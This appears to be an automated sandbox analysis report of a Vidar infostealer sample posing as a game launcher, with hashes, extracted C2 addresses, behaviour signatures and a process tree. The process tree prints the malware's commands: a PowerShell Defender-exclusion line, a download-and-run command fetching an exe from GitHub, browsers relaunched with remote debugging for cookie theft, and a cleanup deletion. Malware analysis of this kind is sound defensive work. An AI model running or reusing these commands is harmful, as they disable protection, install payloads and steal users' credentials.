Analysis
-
max time kernel
139s -
max time network
138s -
platform
windows10-2004_x64 -
resource
win10v2004-20250313-en -
resource tags
arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system -
submitted
31/03/2025, 14:52
Static task
static1
Behavioral task
behavioral1
Sample
LauncherByLueV10.3.exe
Resource
win10v2004-20250313-en
General
-
Target
LauncherByLueV10.3.exe
-
Size
356KB
-
MD5
882f2b592e06416f4941bb547b6cfb78
-
SHA1
8a0924295b92688ceab0dcf3ba2fc32c73ae46e4
-
SHA256
73ebf92726261418991dfda72c656a6b9b8322a1fb79315ec5e614857431a77f
-
SHA512
3ed5bdc33be70e2fc8c40b528939e60d7cc1a7dc5759582a27e9c05e255e6078356eb3957829d4d298fd03f3f3263a09a6728f4c776aa218f75862a486e19872
-
SSDEEP
6144:kXXP6c1lu4PtsMUAfRf+BHA1V8x4ZvkbsUoUM/fbh+oJLX:kXD184PtrLRf+BgY4Zs7oZ/FzX
Malware Config
Extracted
vidar
13.3
23b8a0e48f77dc82cb41b2936121fd07
https://t.me/lw25chm
https://steamcommunity.com/profiles/76561199839170361
-
user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0
Signatures
-
Detect Vidar Stealer 1 IoCs
resource yara_rule behavioral1/files/0x000d0000000240d9-33.dat family_vidar_v7 -
Vidar family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 30 436 powershell.exe 33 436 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4884 powershell.exe 436 powershell.exe -
Downloads MZ/PE file 1 IoCs
flow pid Process 33 436 powershell.exe -
Uses browser remote debugging 2 TTPs 8 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 1100 msedge.exe 5440 msedge.exe 5648 chrome.exe 4924 chrome.exe 1624 chrome.exe 2952 chrome.exe 1848 chrome.exe 4904 msedge.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation LauncherByLueV10.3.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation fxjrhppcxawb.exe -
Executes dropped EXE 1 IoCs
pid Process 3364 fxjrhppcxawb.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 32 raw.githubusercontent.com 33 raw.githubusercontent.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fxjrhppcxawb.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe -
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString fxjrhppcxawb.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 fxjrhppcxawb.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 5500 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133879063675968524" chrome.exe -
Suspicious behavior: EnumeratesProcesses 19 IoCs
pid Process 4884 powershell.exe 4884 powershell.exe 436 powershell.exe 436 powershell.exe 436 powershell.exe 3364 fxjrhppcxawb.exe 3364 fxjrhppcxawb.exe 3364 fxjrhppcxawb.exe 3364 fxjrhppcxawb.exe 5648 chrome.exe 5648 chrome.exe 3364 fxjrhppcxawb.exe 3364 fxjrhppcxawb.exe 3364 fxjrhppcxawb.exe 3364 fxjrhppcxawb.exe 3364 fxjrhppcxawb.exe 3364 fxjrhppcxawb.exe 3364 fxjrhppcxawb.exe 3364 fxjrhppcxawb.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
pid Process 5648 chrome.exe 5648 chrome.exe 5648 chrome.exe 5648 chrome.exe 4904 msedge.exe 4904 msedge.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
description pid Process Token: SeDebugPrivilege 4884 powershell.exe Token: SeDebugPrivilege 436 powershell.exe Token: SeShutdownPrivilege 5648 chrome.exe Token: SeCreatePagefilePrivilege 5648 chrome.exe Token: SeShutdownPrivilege 5648 chrome.exe Token: SeCreatePagefilePrivilege 5648 chrome.exe Token: SeShutdownPrivilege 5648 chrome.exe Token: SeCreatePagefilePrivilege 5648 chrome.exe Token: SeShutdownPrivilege 5648 chrome.exe Token: SeCreatePagefilePrivilege 5648 chrome.exe Token: SeShutdownPrivilege 5648 chrome.exe Token: SeCreatePagefilePrivilege 5648 chrome.exe Token: SeShutdownPrivilege 5648 chrome.exe Token: SeCreatePagefilePrivilege 5648 chrome.exe Token: SeShutdownPrivilege 5648 chrome.exe Token: SeCreatePagefilePrivilege 5648 chrome.exe -
Suspicious use of FindShellTrayWindow 27 IoCs
pid Process 5648 chrome.exe 5648 chrome.exe 5648 chrome.exe 5648 chrome.exe 5648 chrome.exe 5648 chrome.exe 5648 chrome.exe 5648 chrome.exe 5648 chrome.exe 5648 chrome.exe 5648 chrome.exe 5648 chrome.exe 5648 chrome.exe 5648 chrome.exe 5648 chrome.exe 5648 chrome.exe 5648 chrome.exe 5648 chrome.exe 5648 chrome.exe 5648 chrome.exe 5648 chrome.exe 5648 chrome.exe 5648 chrome.exe 5648 chrome.exe 5648 chrome.exe 5648 chrome.exe 4904 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5900 wrote to memory of 4776 5900 LauncherByLueV10.3.exe 95 PID 5900 wrote to memory of 4776 5900 LauncherByLueV10.3.exe 95 PID 4776 wrote to memory of 4884 4776 cmd.exe 96 PID 4776 wrote to memory of 4884 4776 cmd.exe 96 PID 5900 wrote to memory of 5716 5900 LauncherByLueV10.3.exe 98 PID 5900 wrote to memory of 5716 5900 LauncherByLueV10.3.exe 98 PID 5716 wrote to memory of 436 5716 cmd.exe 99 PID 5716 wrote to memory of 436 5716 cmd.exe 99 PID 5900 wrote to memory of 3364 5900 LauncherByLueV10.3.exe 101 PID 5900 wrote to memory of 3364 5900 LauncherByLueV10.3.exe 101 PID 5900 wrote to memory of 3364 5900 LauncherByLueV10.3.exe 101 PID 3364 wrote to memory of 5648 3364 fxjrhppcxawb.exe 104 PID 3364 wrote to memory of 5648 3364 fxjrhppcxawb.exe 104 PID 5648 wrote to memory of 4368 5648 chrome.exe 105 PID 5648 wrote to memory of 4368 5648 chrome.exe 105 PID 5648 wrote to memory of 3632 5648 chrome.exe 106 PID 5648 wrote to memory of 3632 5648 chrome.exe 106 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 1820 5648 chrome.exe 107 PID 5648 wrote to memory of 4924 5648 chrome.exe 110 PID 5648 wrote to memory of 4924 5648 chrome.exe 110 PID 5648 wrote to memory of 4924 5648 chrome.exe 110 PID 5648 wrote to memory of 4924 5648 chrome.exe 110 PID 5648 wrote to memory of 4924 5648 chrome.exe 110 PID 5648 wrote to memory of 4924 5648 chrome.exe 110 PID 5648 wrote to memory of 4924 5648 chrome.exe 110 PID 5648 wrote to memory of 4924 5648 chrome.exe 110 PID 5648 wrote to memory of 4924 5648 chrome.exe 110 PID 5648 wrote to memory of 4924 5648 chrome.exe 110 PID 5648 wrote to memory of 4924 5648 chrome.exe 110 PID 5648 wrote to memory of 4924 5648 chrome.exe 110 PID 5648 wrote to memory of 4924 5648 chrome.exe 110 PID 5648 wrote to memory of 4924 5648 chrome.exe 110 PID 5648 wrote to memory of 4924 5648 chrome.exe 110 PID 5648 wrote to memory of 4924 5648 chrome.exe 110 PID 5648 wrote to memory of 4924 5648 chrome.exe 110
Processes
-
C:\Users\Admin\AppData\Local\Temp\LauncherByLueV10.3.exe"C:\Users\Admin\AppData\Local\Temp\LauncherByLueV10.3.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5900 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\nbmasijv', 'C:\Users', 'C:\ProgramData'"2⤵
- Suspicious use of WriteProcessMemory
PID:4776 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\nbmasijv', 'C:\Users', 'C:\ProgramData'"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4884
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/mnotpadppppp.exe' -OutFile 'C:\Users\Admin\AppData\Local\nbmasijv\fxjrhppcxawb.exe'"2⤵
- Suspicious use of WriteProcessMemory
PID:5716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/mnotpadppppp.exe' -OutFile 'C:\Users\Admin\AppData\Local\nbmasijv\fxjrhppcxawb.exe'"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:436
-
-
-
C:\Users\Admin\AppData\Local\nbmasijv\fxjrhppcxawb.exe"C:\Users\Admin\AppData\Local\nbmasijv\fxjrhppcxawb.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3364 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"3⤵
- Uses browser remote debugging
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5648 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffbf00adcf8,0x7ffbf00add04,0x7ffbf00add104⤵PID:4368
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1560,i,10181064003639365993,7804899373674473572,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2064 /prefetch:34⤵PID:3632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2028,i,10181064003639365993,7804899373674473572,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=1948 /prefetch:24⤵PID:1820
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2380,i,10181064003639365993,7804899373674473572,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=2392 /prefetch:84⤵PID:3200
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3056,i,10181064003639365993,7804899373674473572,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3080 /prefetch:14⤵
- Uses browser remote debugging
PID:4924
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3040,i,10181064003639365993,7804899373674473572,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=3048 /prefetch:14⤵
- Uses browser remote debugging
PID:1624
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4256,i,10181064003639365993,7804899373674473572,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4276 /prefetch:24⤵
- Uses browser remote debugging
PID:2952
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4624,i,10181064003639365993,7804899373674473572,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=4700 /prefetch:14⤵
- Uses browser remote debugging
PID:1848
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4920,i,10181064003639365993,7804899373674473572,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5336 /prefetch:84⤵PID:5068
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5516,i,10181064003639365993,7804899373674473572,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5268 /prefetch:84⤵PID:1740
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5268,i,10181064003639365993,7804899373674473572,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5388 /prefetch:84⤵PID:680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5404,i,10181064003639365993,7804899373674473572,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5796 /prefetch:84⤵PID:4628
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5788,i,10181064003639365993,7804899373674473572,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5416 /prefetch:84⤵PID:4876
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5780,i,10181064003639365993,7804899373674473572,262144 --variations-seed-version=20250312-184628.452000 --mojo-platform-channel-handle=5332 /prefetch:84⤵PID:2432
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"3⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:4904 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x260,0x7ffbe05cf208,0x7ffbe05cf214,0x7ffbe05cf2204⤵PID:4980
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1920,i,4869107931429581509,2755216955509441732,262144 --variations-seed-version --mojo-platform-channel-handle=2616 /prefetch:34⤵PID:3564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2588,i,4869107931429581509,2755216955509441732,262144 --variations-seed-version --mojo-platform-channel-handle=2584 /prefetch:24⤵PID:3520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1848,i,4869107931429581509,2755216955509441732,262144 --variations-seed-version --mojo-platform-channel-handle=2864 /prefetch:84⤵PID:4912
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3536,i,4869107931429581509,2755216955509441732,262144 --variations-seed-version --mojo-platform-channel-handle=3572 /prefetch:14⤵
- Uses browser remote debugging
PID:5440
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3548,i,4869107931429581509,2755216955509441732,262144 --variations-seed-version --mojo-platform-channel-handle=3580 /prefetch:14⤵
- Uses browser remote debugging
PID:1100
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\2d2ny" & exit3⤵
- System Location Discovery: System Language Discovery
PID:1068 -
C:\Windows\SysWOW64\timeout.exetimeout /t 114⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5500
-
-
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:1744
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc1⤵PID:624
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"1⤵PID:4296
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Modify Authentication Process
1Steal Web Session Cookie
1Unsecured Credentials
4Credentials In Files
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
649B
MD58b17320d8a1c87577398055cd4475a06
SHA1194d7ec2c4e744a6bebb124d68994f6370073708
SHA2561afee9fda2e99fc5cf5e6c4ceca2b4a53c606232e375dbf1edd9b804e83faab2
SHA512796c413232a6d448fd435c05785982f31c4ca4948f82aa1e98eb1e1d240332cebfb10caffd5bf2af33968789eaa60200deb40f542f7d0d339c3a87c3f4bd9d86
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
79KB
MD564e030f27a19701d1e8a82f620cf9087
SHA1187a47d769fddb45d5bb8c86efad5ae94451964a
SHA256530015d29696e675c7224c45066ff38860d98f2a545f3a2cbf76c515ae3019ad
SHA512fdacf0d38cdc3605d8da5345dd0f772052dfc2113a2d93e1e96b4b24cf429ab88f37fd87525fe9c6af22de69b9119cdcd5246cd6cda22abf593353af31047706
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
280B
MD5998db8a9f40f71e2f3d9e19aac4db4a9
SHA1dade0e68faef54a59d68ae8cb3b8314b6947b6d7
SHA2561b28744565eb600485d9800703f2fb635ecf4187036c12d47f86bbd1e078e06b
SHA5120e66fd26a11507f78fb1b173fd50555dbd95b0d330e095cdd93206757c6af2780ece914a11a23cd4c840636a59470f44c6db35fa392303fb583806264e652016
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\82b7debc-6870-41fd-888d-a5b0415972aa.tmp
Filesize1B
MD55058f1af8388633f609cadb75a75dc9d
SHA13a52ce780950d4d969792a2559cd519d7ee8c727
SHA256cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA5120b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\3b23d876-3b29-4552-b5ee-c094dacbfe2e\index-dir\the-real-index
Filesize2KB
MD5db11fe9a01cb8fb714f328fd47f2caec
SHA1a38713bb2db4e1b26398aa85b54cfab769de729c
SHA2561c3f08002261dbfc0abbbc5f3fdfc0e40476fdedcafca602ec8ef125127d942d
SHA512ae72f7de297c53388487946ec0c55807629cfdffed0fde73f39a73d57cbcf00f0189e40f43f9a883bc5839f86220d0dce5560a1635bf397899ac84a5dae1caa2
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\3b23d876-3b29-4552-b5ee-c094dacbfe2e\index-dir\the-real-index~RFe58216e.TMP
Filesize2KB
MD5736fa6ac46f2a6728b65d0700253d54a
SHA11feb6b214fbe8172366818a1d8d41ab0f912ee65
SHA25609b4c1e9c697f5d9ebb8e2dfed0b9a68b22861ddd3faee4f9d48d6828c863cbe
SHA512c1a55e754388c74f69f36d6092f01362fa2169933e6a4afa6a08eab4dac19831105ea74d0b35b7531d8ca255f377f5d1a5647140632ee1053f1826a1d633ae20
-
Filesize
40KB
MD5dc32fc9e3d04b60e7b229c77dc629b65
SHA14a15912a709cf17e08133add8ac8881c3acefd60
SHA2569546c9a41a72bdd3ba31c8c911e8cca9af6ffdd6d49e9f623725d5a1c32a8025
SHA5126c2b19ccaec661433704fc2d0cea7bcf15d1df28220cb8c1e99a968b58b83051ba20f9da970ca487ec6080d51a2d684af408a8ef645042b07ec4ca9f6ce65953
-
Filesize
944B
MD5555e68af1b8e33f84346bf2335e6191a
SHA1fa078ed3a608f05ae2dd2db8ed52d6bafe8d510e
